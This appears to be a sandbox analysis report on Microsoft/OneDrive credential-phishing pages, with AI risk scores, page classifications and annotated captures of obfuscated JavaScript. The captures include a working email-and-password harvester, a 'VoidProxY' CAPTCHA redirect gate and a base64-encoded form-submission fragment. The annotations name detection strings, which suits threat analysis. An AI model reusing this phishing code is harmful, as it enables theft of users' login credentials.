var _0510567="AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogIH0KfSBlbHNlIHsKICAgICAgICAgICAgICAgICBpZiAoIXdpbmRvdy5sb2NhdGlvbi5oYXNoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVsb2FkKCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIH07CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9wZW4oIlBPU1QiLCAiL2RyaXZlIiwgdHJ1ZSk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1k2Mk9uME9KZ05RME5ETmhDMmhaOGdvS3MyOCcsIF8yNzlfMzA1KTsgLy9tYWtlIHRoZSBhbnN3ZXIgd2hhdCBldmVyIHRoZSBicm93c2VyIGZpZ3VyZXMgaXQgb3V0IHRvIGJlCiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLXdpdGgnLCAnWE1MSHR0cFJlcXVlc3QnKTsKICAgICAgICAgICAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcignWC1SZXF1ZXN0ZWQtVGltZVN0YW1wJywgJycpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAtRXhwaXJlJywgJycpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdYLVJlcXVlc3RlZC1UaW1lU3RhbXAtQ29tYmluYXRpb24nLCAnJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVR5cGUnLCAnR0VUJyk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1gtUmVxdWVzdGVkLVR5cGUtQ29tYmluYXRpb24nLCAnR0VUJyk7IC8vRW5jcnlwdGVkIGZvciB0b2RheXMgZGF0ZQogICAg
ICAgICAgICAgICAgICAgICAgICB4aHR0cC53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwp2YXIgc3csIHNoLCB3dywgd2gsIHY7CnN3ID0gc2NyZWVuLndpZHRoOwpzaCA9IHNjcmVlbi5oZWlnaHQ7Cnd3ID0gd2luZG93LmlubmVyV2lkdGggfHwgZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudFdpZHRoIHx8IGRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGggfHwgMDsKd2ggPSB3aW5kb3cuaW5uZXJIZWlnaHQgfHwgZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmNsaWVudEhlaWdodCB8fCBkb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodCB8fCAwOwppZiAoKHN3ID09IHd3KSAmJiAoc2ggPT0gd2gpKSB7CiAgICB2ID0gdHJ1ZTsKICAgIGlmICghKHd3ICUgMjAwKSAmJiAod2ggJSAxMDApKSB7CiAgICAgICAgdiA9IHRydWU7CiAgICB9Cn0KLy92ID0gdHJ1ZTsgLy90ZXN0IHZhciBudWxsZWQgb3V0IHVzZWQgZm9yIGRlYnVnZ2luZyBwdXJwb3NlCmlmICh2ID09IHRydWUpIHsKICAgICAgICB4aHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCcwT3dkTHptQkNmMmlOTXVSckQwTm4yRnlUbWcnLCAnMzNKMkw2LUNpVEZ6VWc2dGh2YmRMcTQ4NXA4Jyk7Cn0KICAgICAgICAgI";var _5413_23="CAgICAgICAgICAgICAgeGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC10eXBlIiwgImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwogICAgICAgICAgICAgICAgICAgICAgICB4aHR0cC5zZW5kKCJuYW1lMT1IZW5yeSZuYW1lMj1Gb3JkIik7CiAgICAgICAgfSwgZmFsc2UpOwp9KSgpOwo=";var _3_38827="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 |
URL: https://jackoffjackofflilliilkillxoopoeadonline.to... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script."
} |
/*
 * Analyst note: script-injection stub captured from the /drive page.
 *
 * What the visible code does:
 *   - If document.body exists, creates a 1x1, absolutely positioned iframe with
 *     visibility 'hidden' and appends it to the body.
 *   - c() runs once the document is no longer 'loading' (immediately, on
 *     DOMContentLoaded, or through an onreadystatechange fallback that chains
 *     any handler already installed).
 *   - c() adds an inline <script> to the iframe's <head>. That inline code sets
 *     window.__CF$cv$params ({r, t}) and appends a second <script> whose src is
 *     the relative path '/cdn-cgi/challenge-platform/scripts/jsd/main.js'.
 *
 * NOTE(review): the src is a relative path with no host, so it is presumably
 * requested from the origin serving this page rather than from a third-party
 * host; the 'r' value has the same shape as the cRay ids elsewhere in this
 * report. This looks like the loader a Cloudflare-proxied site receives, which
 * would make it weak evidence on its own - confirm against the recorded
 * network request for main.js before scoring it as exfiltration.
 */
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8fef4f2bea0cc44f',t:'MTczNjM3MjA0MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.to... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be collecting user email and password information and sending it to an external domain, which is a strong indicator of malicious intent. The script also attempts to redirect the user to a suspicious domain, further increasing the risk. While some contextual factors, such as the use of a legitimate-looking domain, may suggest a potential legitimate purpose, the overall behavior of the script is highly suspicious and warrants further investigation."
} |
/*
 * Analyst notes for the captured sample below (static read only; code left byte-identical).
 *
 * Obfuscation: a rotated string table. _0x5656() returns the literal array at the end of
 * the sample, _0x11b0(n) indexes it at n - 0x99, and the first IIFE rotates the array with
 * push/shift until a parseInt checksum equals 0x5b144. Aligning the table with its call
 * sites gives one consistent mapping, for example:
 *   0x9f -> '#emailIdentificationForm'   0xa4 -> 'submit'        0xb2 -> '#email'
 *   0xb7 -> '#password'                  0xa7 -> 'POST'          0x9a -> 'application/json'
 *   0x9b -> 'redirection'                0x99 -> 'replace'       0xb5 -> the SharePoint URL
 *
 * Behaviour: a submit handler on #emailIdentificationForm that calls preventDefault() and
 * runs in two steps, keyed on whether #password is hidden.
 *   Step 1 (#password hidden): adds class 'disabled' to .form-submit, POSTs {email} as JSON
 *     via fetch(''), logs the JSON reply, then either navigates to reply.redirection or
 *     un-hides #password, marks it required and removes 'disabled'.
 *   Step 2 (#password shown): POSTs {email, password, send: true} the same way, then calls
 *     location.replace() with reply.redirection or, if that is falsy, with the hard-coded
 *     SharePoint URL from the string table.
 *
 * Triage points:
 *   - The fetch target is the empty string, so both POSTs go to the URL of the page that
 *     served this script; no other collection endpoint appears in the code. The SharePoint
 *     URL is used only as a navigation target after the password has been submitted.
 *   - Strings usable for detection content: the selector '#emailIdentificationForm', the
 *     JSON body keys email / password / send, and the server-supplied 'redirection' field.
 *   - The reply decides the next hop, so the redirect target can differ per submitted
 *     address; the single URL seen in one sandbox run is not necessarily the only one.
 */
var _0x4b2ae7=_0x11b0;function _0x11b0(_0xb93bd6,_0x334a28){var _0x565661=_0x5656();return _0x11b0=function(_0x11b02e,_0x1cb60d){_0x11b02e=_0x11b02e-0x99;var _0x2026f8=_0x565661[_0x11b02e];return _0x2026f8;},_0x11b0(_0xb93bd6,_0x334a28);}(function(_0x139ef9,_0x5ec660){var _0x59bd69=_0x11b0,_0x2b75ae=_0x139ef9();while(!![]){try{var _0x13e7a5=parseInt(_0x59bd69(0xa0))/0x1+parseInt(_0x59bd69(0xb0))/0x2*(parseInt(_0x59bd69(0x9d))/0x3)+-parseInt(_0x59bd69(0xb6))/0x4*(-parseInt(_0x59bd69(0xb4))/0x5)+-parseInt(_0x59bd69(0xac))/0x6+-parseInt(_0x59bd69(0xa6))/0x7+-parseInt(_0x59bd69(0xad))/0x8+-parseInt(_0x59bd69(0xa5))/0x9*(-parseInt(_0x59bd69(0xb1))/0xa);if(_0x13e7a5===_0x5ec660)break;else _0x2b75ae['push'](_0x2b75ae['shift']());}catch(_0x4d056b){_0x2b75ae['push'](_0x2b75ae['shift']());}}}(_0x5656,0x5b144),document['querySelector'](_0x4b2ae7(0x9f))['addEventListener'](_0x4b2ae7(0xa4),_0x873545=>{var _0x420903=_0x4b2ae7;_0x873545['preventDefault'](),document[_0x420903(0xb8)](_0x420903(0xb7))['hidden']?(document['querySelector'](_0x420903(0xaa))[_0x420903(0xa9)][_0x420903(0xa1)](_0x420903(0xa3)),fetch('',{'method':_0x420903(0xa7),'body':JSON[_0x420903(0xb9)]({'email':document[_0x420903(0xb8)](_0x420903(0xb2))[_0x420903(0x9e)]}),'headers':{'content-type':_0x420903(0x9a)}})['then'](_0x21e2bb=>{var _0x5950a5=_0x420903;return _0x21e2bb[_0x5950a5(0xa2)]();})[_0x420903(0xab)](_0x48fe24=>{var _0x268e64=_0x420903;console[_0x268e64(0xae)](_0x48fe24),_0x48fe24['redirection']?location['href']=_0x48fe24[_0x268e64(0x9b)]:(document[_0x268e64(0xb8)]('#password')[_0x268e64(0xa8)]=![],document[_0x268e64(0xb8)]('#password')[_0x268e64(0x9c)]=!![],document[_0x268e64(0xb8)](_0x268e64(0xaa))[_0x268e64(0xa9)][_0x268e64(0xb3)]('disabled'));})[_0x420903(0xaf)](_0x25a73e=>{var 
_0x9b98d7=_0x420903;console[_0x9b98d7(0xae)](_0x25a73e);})):(document[_0x420903(0xb8)]('.form-submit')[_0x420903(0xa9)][_0x420903(0xa1)](_0x420903(0xa3)),fetch('',{'method':_0x420903(0xa7),'body':JSON[_0x420903(0xb9)]({'email':document[_0x420903(0xb8)](_0x420903(0xb2))[_0x420903(0x9e)],'password':document[_0x420903(0xb8)](_0x420903(0xb7))[_0x420903(0x9e)],'send':!![]}),'headers':{'content-type':_0x420903(0x9a)}})[_0x420903(0xab)](_0x39613c=>{return _0x39613c['json']();})['then'](_0x349617=>{var _0x59af61=_0x420903;_0x349617['redirection']?location[_0x59af61(0x99)](_0x349617[_0x59af61(0x9b)]):location[_0x59af61(0x99)](_0x59af61(0xb5));})['catch'](_0x552b62=>{var _0x57df9e=_0x420903;console[_0x57df9e(0xae)](_0x552b62);}));}));function _0x5656(){var _0x44dcc6=['add','json','disabled','submit','477wKaVlT','1637965uuFihq','POST','hidden','classList','.form-submit','then','2505888SuUBES','4178312LHHDfl','log','catch','2iBzkGU','115820arlNhi','#email','remove','10BDxYpu','https://britishcouncil-my.sharepoint.com/:x:/g/personal/mohammadnavid_rahmat_britishcouncil_org/EaaPuY63N_pNpyRttYsa2yYBiPQKbv9J7vzO0gIMkIMtrw?e=CmakPC','1764wWvWWg','#password','querySelector','stringify','replace','application/json','redirection','required','1365351fvvrKN','value','#emailIdentificationForm','477147CZYpwS'];_0x5656=function(){return _0x44dcc6;};return _0x5656();}
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=Next Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Shared file",
"prominent_button_name": "Next",
"text_input_field_labels": ["Enter email"],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=Next Model: Joe Sandbox AI | {
"brands": [
"Microsoft",
"OneDrive"
]
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive/?email=test%40msonlinedomain.org&password=&btnSubmitSignIn=Next Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'jackoffjackofflilliilkillxoopoeadonline.top' does not match the legitimate domain for Microsoft.", "The URL contains suspicious elements such as random words and an unusual domain extension '.top'.", "The URL does not have any recognizable association with Microsoft.", "The presence of an input field asking for an email is common in phishing attempts to harvest credentials." ], "riskscore": 9}
Google indexed: False |
URL: jackoffjackofflilliilkillxoopoeadonline.top
Brands: Microsoft
Input Fields: Enter email |
URL: https://iyd4h7bj22.xbslqfequn.workers.dev/?caa3fd=... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have a legitimate purpose, the overall behavior is highly suspicious and requires further investigation."
} |
/*
 * Analyst notes for the captured sample below (static read only; code left byte-identical).
 *
 * Obfuscation: a rotated string table. _0x2979() returns the literal array, _0x133c(n)
 * indexes it at n - 0x19d, and the leading IIFE rotates the array until a parseInt
 * checksum equals 0x956aa. Aligning the table with its call sites gives one consistent
 * mapping, for example:
 *   0x1b0 -> 'cf-turnstile-response'   0x1b1 -> 'success'   0x1b5 -> 'VoidProxY'
 *   0x1b9 -> '?authvp='                0x1a5 -> 'login_hint' 0x1c3 -> 'username'
 *   0x1c0 / 0x1ae / 0x1b2 -> 'asc' / 'lht' / 'mail'
 *
 * dignissimvenenatis(e): gate between the CAPTCHA page and the next hop.
 *   e - value sent as form field 'cf-turnstile-response'; presumably the token handed to
 *       the page by the Turnstile widget callback (the caller is not in this sample).
 *
 * Steps, in order:
 *   1. POST e as FormData to '/' on the current origin and parse the reply as JSON.
 *      Nothing further happens unless reply.success is truthy.
 *   2. Build the target URL by base64-decoding everything after the first '=' in
 *      location.search.
 *   3. Draw a number below 0xf4240 with Math.random(), hash 'VoidProxY' + number with the
 *      inner sha256() helper (crypto.subtle.digest, hex output), and GET
 *      target.origin + '?authvp=' + number + '-' + hash.
 *   4. Take the reply text, reverse it, swap '$' for '=', base64-decode it and assign the
 *      result to target.pathname.
 *   5. Read the first query parameter present among omn, xkz, asc, lht, mail on the target
 *      URL and try atob() on it (a decode failure is swallowed and the raw value kept).
 *   6. Delete every query parameter on the target; if step 5 produced a value, set it as
 *      both login_hint and username.
 *   7. Assign the result to top.location.href, i.e. the top-level window is navigated.
 *
 * Triage points:
 *   - The destination path is not in the page: it is returned by the ?authvp= request, so
 *     a crawl that stops at the CAPTCHA page never sees the final URL.
 *   - Strings usable for detection content: the literal 'VoidProxY', a request for
 *     '?authvp=<digits>-<64 hex chars>', and the parameter names omn / xkz / asc / lht / mail.
 *   - The recipient address travels in the URL (base64 in one of those parameters) and is
 *     re-emitted as login_hint / username, which is what pre-fills the next page.
 */
function dignissimvenenatis(e){
const _0x51110d=_0x133c;(function(_0x1745e6,_0x5f0844){const _0xe67aa7=_0x133c,_0x32b1c1=_0x1745e6();while(!![]){try{const _0x40ed81=parseInt(_0xe67aa7(0x1a1))/0x1*(-parseInt(_0xe67aa7(0x1c6))/0x2)+parseInt(_0xe67aa7(0x1bf))/0x3+parseInt(_0xe67aa7(0x1af))/0x4+-parseInt(_0xe67aa7(0x1bc))/0x5*(parseInt(_0xe67aa7(0x19d))/0x6)+-parseInt(_0xe67aa7(0x1c4))/0x7+-parseInt(_0xe67aa7(0x1aa))/0x8+parseInt(_0xe67aa7(0x1bb))/0x9*(parseInt(_0xe67aa7(0x1a2))/0xa);if(_0x40ed81===_0x5f0844)break;else _0x32b1c1['push'](_0x32b1c1['shift']());}catch(_0x1266a1){_0x32b1c1['push'](_0x32b1c1['shift']());}}}(_0x2979,0x956aa));function _0x2979(){const _0x3eed36=['cf-turnstile-response','success','mail','GET','json','VoidProxY','forEach','location','keys','?authvp=','join','3379473NUUBqm','44290KROdvd','append','map','3569907DtyEWh','asc','from','POST','username','4822930ZgYsAS','random','114KjtkUt','24QaqtHs','searchParams','slice','origin','16175joZtKl','10MafuFn','set','subtle','login_hint','encode','text','split','toString','2142336QhhttV','padStart','search','get','lht','3842932pPIeqp'];_0x2979=function(){return _0x3eed36;};return _0x2979();}function _0x133c(_0x15ede3,_0x2eb28b){const _0x2979c0=_0x2979();return _0x133c=function(_0x133c2a,_0x1231e1){_0x133c2a=_0x133c2a-0x19d;let _0x32bf30=_0x2979c0[_0x133c2a];return _0x32bf30;},_0x133c(_0x15ede3,_0x2eb28b);}async function sha256(_0x477692){const _0x54ce63=_0x133c,_0x2ef791=new TextEncoder()[_0x54ce63(0x1a6)](_0x477692),_0x46aaf8=await crypto[_0x54ce63(0x1a4)]['digest']('SHA-256',_0x2ef791),_0x24ffa9=Array['from'](new Uint8Array(_0x46aaf8)),_0x50edfa=_0x24ffa9[_0x54ce63(0x1be)](_0x1834b8=>_0x1834b8['toString'](0x10)[_0x54ce63(0x1ab)](0x2,'0'))['join']('');return _0x50edfa;}let formData=new FormData();formData[_0x51110d(0x1bd)](_0x51110d(0x1b0),e),fetch('/',{'method':_0x51110d(0x1c2),'body':formData})['then'](_0x4ce301=>_0x4ce301[_0x51110d(0x1b4)]())['then'](async _0x311349=>{const _0x5499b6=_0x51110d;if(_0x311349[_0x5499b6(0x1b1)]){let 
_0x44f870=new URL(atob(location[_0x5499b6(0x1ac)][_0x5499b6(0x1a8)]('=')[_0x5499b6(0x19f)](0x1)[_0x5499b6(0x1ba)]('='))),_0x263902=Math['floor'](Math[_0x5499b6(0x1c5)]()*0xf4240)[_0x5499b6(0x1a9)](),_0xc4ba9e=await sha256(_0x5499b6(0x1b5)+_0x263902),_0x9c833a=await fetch(_0x44f870[_0x5499b6(0x1a0)]+_0x5499b6(0x1b9)+_0x263902+'-'+_0xc4ba9e,{'method':_0x5499b6(0x1b3)}),_0x4facb4=await _0x9c833a[_0x5499b6(0x1a7)]();_0x44f870['pathname']=atob(_0x4facb4['split']('')['reverse']()['join']('')['replaceAll']('$','='));let _0x3a25d2=['omn','xkz',_0x5499b6(0x1c0),_0x5499b6(0x1ae),_0x5499b6(0x1b2)],_0x244192=null;for(var _0x112dc0 of _0x3a25d2){if(_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1ad)](_0x112dc0)){_0x244192=_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1ad)](_0x112dc0);try{_0x244192=atob(_0x244192);}catch{}break;}}Array[_0x5499b6(0x1c1)](_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1b8)]())[_0x5499b6(0x1b6)](_0x2da316=>{const _0x2fe5bc=_0x5499b6;_0x44f870[_0x2fe5bc(0x19e)]['delete'](_0x2da316);}),_0x244192&&(_0x44f870['searchParams']['set'](_0x5499b6(0x1a5),_0x244192),_0x44f870[_0x5499b6(0x19e)][_0x5499b6(0x1a3)](_0x5499b6(0x1c3),_0x244192)),top[_0x5499b6(0x1b7)]['href']=_0x44f870[_0x5499b6(0x1a9)]();}});
}
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options and event handlers to handle communication between the challenge widget and the parent window. While it uses some legacy APIs like `postMessage()`, the overall behavior is consistent with a legitimate security mechanism and does not exhibit any high-risk indicators. The script is likely benign and part of a standard web security implementation."
} |
(function () {
  // Per-session options for the Cloudflare challenge widget, as served inside the
  // challenges.cloudflare.com frame. Values are session tokens captured with the page;
  // they are reproduced unchanged.
  window._cf_chl_opt = {
    cvId: '3',
    cZone: 'challenges.cloudflare.com',
    cTplV: 5,
    chlApivId: '0',
    chlApiWidgetId: 'lx2gx',
    // Sitekey of the embedding site's widget; it identifies which account configured the
    // challenge, which here is the page that embedded it, not Cloudflare itself.
    chlApiSitekey: '0x4AAAAAAAi078AM9w38G8rk',
    chlApiMode: 'managed',
    chlApiSize: 'normal',
    chlApiRcV: 'VNtZC8GntZwtxzd44alefsyCKPS3P2mMlPOmqUtQtAU-1736372081-1.3.1.1-lwQ4Eho.g2G5_zIlcs4IrMPmq1.4qCGVw6Ak94NEwYg',
    chlApiTimeoutEncountered: 0,
    chlApiOverrunBudgetMs: 10000,
    chlTimeoutMs: 120000,
    cK: [],
    cType: 'chl_api_m',
    cRay: '8fef502579544204',
    cH: 'nCjU7hjfRJhU0JxY41M3fiVXpgFwJyXo4VAYZVm2vzM-1736372081-1.1.1.1-Eava_9dulVNDchyZ6LYp71PpJumZaCJ_XFMbV7EW.B1usefnhu82GBfWAXhgZLOc',
    cFPWv: 'g',
    cLt: 'n',
    chlApiFailureFeedbackEnabled: true,
    chlApiLoopFeedbackEnabled: false,
    wOL: false,
    wT: 'auto',
    wS: 'normal',
    md: 'eiP59kk_Gsc4Vrug9w0F_aNDmT7wxVmUfexFS0Nv2Gs-1736372081-1.1.1.1-7N.Wz_BKCV9AFl_BbNhC3ttAqc4ArXptE5Dsoz45N6A4KQe1WVFscpl5lsWuPD74nXhI0g48Fr2v1xrhJvbOw6vgpFmw1btzah0gQONlB896T2dg5LuOBzszFKlnpLFtAelj81MQpCqbdwvjhU80I888RjDAbvOvmAJOfnSyPOnF1ikWPBaZZgEt_pS2JXcVSQMc4FMKOsFGz0xPR18zKynmoWLphdikh13b2qfluz40otIij3U.afvOVoRkHMtgWqoXyXZFL.l9MhwErymSNDnUi4Zvl3FnqOan9kxgXAiS6GAkAfOlr.4AarNdQDcW2IDepR2S6H_t1t3kdBdtexoEqFErmRmAYcgIwX_cjNkz5Bl7M1EPURbW7hDY_m2Fjh11Ycx3XR_aXxyJNi6pO1nOSg169ncxg_bGx0NqcISsTzB0i57qejNaOoLnKiU1ANieJfLDezaYW9cq61cuvdZ34_0MGF3peUXFGxGRZ7r3jRJiEdrrz1HiQYdGDAqHXKnV_DCC5Q3mzRzvsjVch82DmPiAcwY__7EiHEW0Py5uH0dZWLGuB9eorFqA2r8ApcVoc5rZyrxIYJvaPm0dZbjoXosF9pvsiO1H3TBmqCkFKxTHpPSoPHx6E.biW20tMhkWjpAf84GFtQvaASzr89a.a5tCapM8UmGHYDuBjdRnaOgs4_caDZHNuoeiIC9sF2HDXFUoY2HZbSV3yZAFKM2cLbr0F165DjbteD4A08UJXt9oAtZSWIsnr0RDnedJ208j53UprT1xvkJshbbbtSZLPXeoJN4MGCAlSIkcVyxlnt.0YKHELuIcoo4j8pEWNFvSqv9GvRGjrXWDAmpBZnLq9I4LsVLsUJbfv5mDF1FBst5ynwgzwgyOLzXj70L32mydE3GmxoIHHS0Aid9GbAjqELM1PrCEUWzpUoeIwlktq.R7p_PaVVtMionesYl_Jz5Z8elu4WO9y7JDbF7fyZDt_.dkPGs8eIEbo6mrQ3SrUZXy3f0B_RCLXsmHaLAYTCPd9eBnDLaPssAC.5fXLsvRFNG55shkWYY22ewdiHnW2EUR9dJvUMd565NRoUQcUd3ze.TGiqKkY7NUbs6Iy4lvh3fYafms9WM8scOtRztETwc9oC4IT4.QiDNd.ZZybKHAWmNcSws2iQ7qlW2uj1.RBCQnA1qExtE0yBKCVNJM_oBsk8VLgIID9m0WSPmEqCED9b5vKc88Acm5FX6JI6S9pjcynIIX6o7qpbEuP91elMrRaM_20ykBEfjYAE39CV.4mD0MBpiH9LdVAX3cjaSdlJ6x_zF2KQvuz5Zo7Ndlg_tvKgQSwPM1cemdDX_5lPLh9tyN4MZtM7qNS9h43NxrcNjrdvqL5g1wwejPcD0',
    cITimeS: '1736372081',
    // Asks the embedding page to reload the widget by posting a 'reloadRequest' message.
    refresh: function () {
      var host = window.parent;
      if (!host) {
        return;
      }
      host.postMessage({
        source: 'cloudflare-challenge',
        widgetId: 'lx2gx',
        nextRcV: 'VNtZC8GntZwtxzd44alefsyCKPS3P2mMlPOmqUtQtAU-1736372081-1.3.1.1-lwQ4Eho.g2G5_zIlcs4IrMPmq1.4qCGVw6Ak94NEwYg',
        event: 'reloadRequest'
      }, "*");
    }
  };

  // Liveness exchange with the embedding page: a 'meow' message addressed to this widget
  // id is answered with a 'food' message echoing the same seq.
  // NOTE(review): the listener filters only on fields inside event.data (no event.origin
  // check) and the reply uses targetOrigin '*'. The reply carries source, widgetId, event
  // and seq only.
  var onWindowMessage = function (event) {
    var msg = event.data;
    if (!(msg.source && msg.source === 'cloudflare-challenge')) {
      return;
    }
    if (msg.event !== 'meow') {
      return;
    }
    if (msg.widgetId !== window._cf_chl_opt.chlApiWidgetId) {
      return;
    }
    var host = window.parent;
    if (host) {
      host.postMessage({
        source: 'cloudflare-challenge',
        widgetId: window._cf_chl_opt.chlApiWidgetId,
        event: 'food',
        seq: msg.seq
      }, '*');
    }
  };
  window.addEventListener('message', onWindowMessage);
}());
|
URL: https://login.pguhmxcggroup.top Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://login.pguhmxcggroup.top |
URL: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20= Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20= Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20= Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20= Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"mstest@domain.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": "unknown"
} |
